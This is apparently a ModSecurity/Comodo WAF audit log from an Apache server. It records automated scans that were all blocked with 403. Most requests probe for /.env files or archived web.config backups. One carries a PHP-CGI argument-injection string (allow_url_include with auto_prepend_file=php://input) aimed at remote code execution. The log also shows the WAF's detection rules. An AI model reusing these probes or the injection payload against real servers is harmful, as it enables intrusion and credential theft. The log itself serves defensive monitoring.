--75205b7f-A--
[14/Apr/2025:12:28:28 +0700] Z_yc_IgxSXM4jtK9zHGJTAAAAMI 103.236.140.4 58274 103.236.140.4 8181
--75205b7f-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 165.232.119.168
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 165.232.119.168
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--75205b7f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--75205b7f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744608508623754 873 (- - -)
Stopwatch2: 1744608508623754 873; combined=343, p1=307, p2=0, p3=0, p4=0, p5=36, sr=82, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--75205b7f-Z--
--e9746203-A--
[14/Apr/2025:12:30:24 +0700] Z_ydcNga3eJwvi_gLpI7jQAAAEs 103.236.140.4 58300 103.236.140.4 8181
--e9746203-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 103.114.105.139
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 103.114.105.139
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
Accept: */*
--e9746203-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e9746203-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744608624601730 916 (- - -)
Stopwatch2: 1744608624601730 916; combined=421, p1=381, p2=0, p3=0, p4=0, p5=40, sr=170, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e9746203-Z--
--b6433502-A--
[14/Apr/2025:12:30:26 +0700] Z_ydctga3eJwvi_gLpI7jgAAAFA 103.236.140.4 58304 103.236.140.4 8181
--b6433502-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 103.114.105.139
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 103.114.105.139
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
Accept: */*
--b6433502-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b6433502-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744608626254920 886 (- - -)
Stopwatch2: 1744608626254920 886; combined=417, p1=381, p2=0, p3=0, p4=0, p5=36, sr=156, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b6433502-Z--
--f1661c4e-A--
[14/Apr/2025:12:55:28 +0700] Z_yjUNga3eJwvi_gLpI7xgAAAFI 103.236.140.4 58522 103.236.140.4 8181
--f1661c4e-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.81.194
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.81.194
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 9; RMX1851) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36
Accept-Charset: utf-8
--f1661c4e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f1661c4e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744610128497816 828 (- - -)
Stopwatch2: 1744610128497816 828; combined=332, p1=296, p2=0, p3=0, p4=0, p5=36, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f1661c4e-Z--
--8f97a305-A--
[14/Apr/2025:13:29:35 +0700] Z_yrT1pzfFgMsbYwm2KeRAAAABY 103.236.140.4 58846 103.236.140.4 8181
--8f97a305-B--
GET /.env HTTP/1.0
Host: mignere.twilightparadox.com
X-Real-IP: 157.245.105.107
X-Forwarded-Host: mignere.twilightparadox.com
X-Forwarded-Server: mignere.twilightparadox.com
X-Forwarded-For: 157.245.105.107
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--8f97a305-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8f97a305-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744612175719845 13101 (- - -)
Stopwatch2: 1744612175719845 13101; combined=25058, p1=223, p2=0, p3=0, p4=0, p5=12444, sr=66, sw=0, l=0, gc=12391
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8f97a305-Z--
--d93e4467-A--
[14/Apr/2025:14:52:30 +0700] Z_y-vtga3eJwvi_gLpI8gQAAAEE 103.236.140.4 59800 103.236.140.4 8181
--d93e4467-B--
POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 103.154.143.162
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 103.154.143.162
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Accept: */*
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Type: application/x-www-form-urlencoded
--d93e4467-C--
--d93e4467-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d93e4467-E--
--d93e4467-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744617150844560 4354 (- - -)
Stopwatch2: 1744617150844560 4354; combined=3122, p1=575, p2=2509, p3=0, p4=0, p5=38, sr=161, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d93e4467-Z--
--f905702b-A--
[14/Apr/2025:16:10:20 +0700] Z_zQ_FpzfFgMsbYwm2KfBwAAAAY 103.236.140.4 33230 103.236.140.4 8181
--f905702b-B--
GET /.env HTTP/1.0
Host: vinic.twilightparadox.com
X-Real-IP: 138.68.82.23
X-Forwarded-Host: vinic.twilightparadox.com
X-Forwarded-Server: vinic.twilightparadox.com
X-Forwarded-For: 138.68.82.23
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--f905702b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f905702b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744621820084344 848 (- - -)
Stopwatch2: 1744621820084344 848; combined=321, p1=284, p2=0, p3=0, p4=0, p5=36, sr=77, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f905702b-Z--
--c617c712-A--
[14/Apr/2025:16:20:39 +0700] Z_zTZ9ga3eJwvi_gLpI85wAAAFM 103.236.140.4 33284 103.236.140.4 8181
--c617c712-B--
GET /.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 196.251.115.37
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 196.251.115.37
X-Forwarded-Proto: http
Connection: close
Accept: */*
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
--c617c712-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c617c712-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744622439188762 773 (- - -)
Stopwatch2: 1744622439188762 773; combined=335, p1=287, p2=0, p3=0, p4=0, p5=48, sr=126, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c617c712-Z--
--93b7453e-A--
[14/Apr/2025:16:20:40 +0700] Z_zTaFpzfFgMsbYwm2KfEgAAABc 103.236.140.4 33288 103.236.140.4 8181
--93b7453e-B--
GET /.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 196.251.115.37
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 196.251.115.37
X-Forwarded-Proto: http
Connection: close
Accept: */*
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
--93b7453e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--93b7453e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744622440537461 736 (- - -)
Stopwatch2: 1744622440537461 736; combined=283, p1=255, p2=0, p3=0, p4=0, p5=28, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--93b7453e-Z--
--51471036-A--
[14/Apr/2025:16:54:38 +0700] Z_zbXtPxEtam20ggC7hDYwAAAI0 103.236.140.4 33970 103.236.140.4 8181
--51471036-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 45.135.193.65
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 45.135.193.65
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; U; Android 2.2; en-us; Droid Build/FRG22D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Accept-Charset: utf-8
--51471036-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--51471036-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744624478968740 826 (- - -)
Stopwatch2: 1744624478968740 826; combined=331, p1=296, p2=0, p3=0, p4=0, p5=35, sr=80, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--51471036-Z--
--28cdee2b-A--
[14/Apr/2025:17:04:20 +0700] Z_zdpNPxEtam20ggC7hDjgAAAJM 103.236.140.4 34158 103.236.140.4 8181
--28cdee2b-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 195.211.191.76
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 195.211.191.76
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
Accept-Charset: utf-8
--28cdee2b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--28cdee2b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744625060131999 875 (- - -)
Stopwatch2: 1744625060131999 875; combined=401, p1=365, p2=0, p3=0, p4=0, p5=36, sr=139, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--28cdee2b-Z--
--707b5b56-A--
[14/Apr/2025:17:17:30 +0700] Z_zgutga3eJwvi_gLpI9JwAAAFY 103.236.140.4 34392 103.236.140.4 8181
--707b5b56-B--
GET /web.config.zip HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 159.65.156.239
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 159.65.156.239
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
--707b5b56-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--707b5b56-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744625850555965 712 (- - -)
Stopwatch2: 1744625850555965 712; combined=299, p1=268, p2=0, p3=0, p4=0, p5=31, sr=108, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--707b5b56-Z--
--7bf1c27c-A--
[14/Apr/2025:17:17:33 +0700] Z_zgvYgxSXM4jtK9zHGKLQAAAMQ 103.236.140.4 34420 103.236.140.4 8181
--7bf1c27c-B--
GET /web.config.rar HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 159.65.156.239
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 159.65.156.239
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
--7bf1c27c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7bf1c27c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744625853644779 703 (- - -)
Stopwatch2: 1744625853644779 703; combined=277, p1=244, p2=0, p3=0, p4=0, p5=33, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7bf1c27c-Z--
--82ca692f-A--
[14/Apr/2025:17:17:36 +0700] Z_zgwFpzfFgMsbYwm2KfqgAAAAk 103.236.140.4 34448 103.236.140.4 8181
--82ca692f-B--
GET /web.config.7z HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 159.65.156.239
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 159.65.156.239
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
--82ca692f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--82ca692f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744625856749453 12834 (- - -)
Stopwatch2: 1744625856749453 12834; combined=24642, p1=219, p2=0, p3=0, p4=0, p5=12228, sr=67, sw=0, l=0, gc=12195
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--82ca692f-Z--
--af59064e-A--
[14/Apr/2025:17:17:39 +0700] Z_zgw4gxSXM4jtK9zHGKNQAAAM4 103.236.140.4 34476 103.236.140.4 8181
--af59064e-B--
GET /web.config.tar HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 159.65.156.239
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 159.65.156.239
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
--af59064e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--af59064e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744625859903034 648 (- - -)
Stopwatch2: 1744625859903034 648; combined=269, p1=237, p2=0, p3=0, p4=0, p5=32, sr=68, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--af59064e-Z--
--09a7af1b-A--
[14/Apr/2025:17:17:43 +0700] Z_zgx1pzfFgMsbYwm2KfsAAAABQ 103.236.140.4 34504 103.236.140.4 8181
--09a7af1b-B--
GET /web.config.gz HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 159.65.156.239
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 159.65.156.239
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
--09a7af1b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--09a7af1b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744625863120974 670 (- - -)
Stopwatch2: 1744625863120974 670; combined=252, p1=225, p2=0, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--09a7af1b-Z--
--5e0ee006-A--
[14/Apr/2025:17:17:46 +0700] Z_zgyogxSXM4jtK9zHGKPAAAANY 103.236.140.4 34532 103.236.140.4 8181
--5e0ee006-B--
GET /web.config.tar.gz HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 159.65.156.239
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 159.65.156.239
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
--5e0ee006-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5e0ee006-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744625866214480 626 (- - -)
Stopwatch2: 1744625866214480 626; combined=249, p1=217, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5e0ee006-Z--
--0af3364e-A--
[14/Apr/2025:17:39:47 +0700] Z_zl84gxSXM4jtK9zHGKTQAAAMM 103.236.140.4 34744 103.236.140.4 8181
--0af3364e-B--
GET /.env HTTP/1.0
Host: vinic.twilightparadox.com
X-Real-IP: 143.110.217.244
X-Forwarded-Host: vinic.twilightparadox.com
X-Forwarded-Server: vinic.twilightparadox.com
X-Forwarded-For: 143.110.217.244
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--0af3364e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0af3364e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744627187211480 826 (- - -)
Stopwatch2: 1744627187211480 826; combined=345, p1=318, p2=0, p3=0, p4=0, p5=26, sr=118, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0af3364e-Z--
--52e6e34c-A--
[14/Apr/2025:17:53:26 +0700] Z_zpJlpzfFgMsbYwm2KfxQAAAAo 103.236.140.4 34840 103.236.140.4 8181
--52e6e34c-B--
GET /.env HTTP/1.0
Host: archiexnz.chickenkiller.com
X-Real-IP: 164.92.244.132
X-Forwarded-Host: archiexnz.chickenkiller.com
X-Forwarded-Server: archiexnz.chickenkiller.com
X-Forwarded-For: 164.92.244.132
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--52e6e34c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--52e6e34c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744628006181045 695 (- - -)
Stopwatch2: 1744628006181045 695; combined=285, p1=245, p2=0, p3=0, p4=0, p5=39, sr=69, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--52e6e34c-Z--
--00eb3d51-A--
[14/Apr/2025:18:05:44 +0700] Z_zsCNPxEtam20ggC7hEFwAAAJg 103.236.140.4 34940 103.236.140.4 8181
--00eb3d51-B--
GET /.env HTTP/1.0
Host: petruk.hauganslekt.no
X-Real-IP: 139.59.136.184
X-Forwarded-Host: petruk.hauganslekt.no
X-Forwarded-Server: petruk.hauganslekt.no
X-Forwarded-For: 139.59.136.184
X-Forwarded-Proto: https
Connection: close
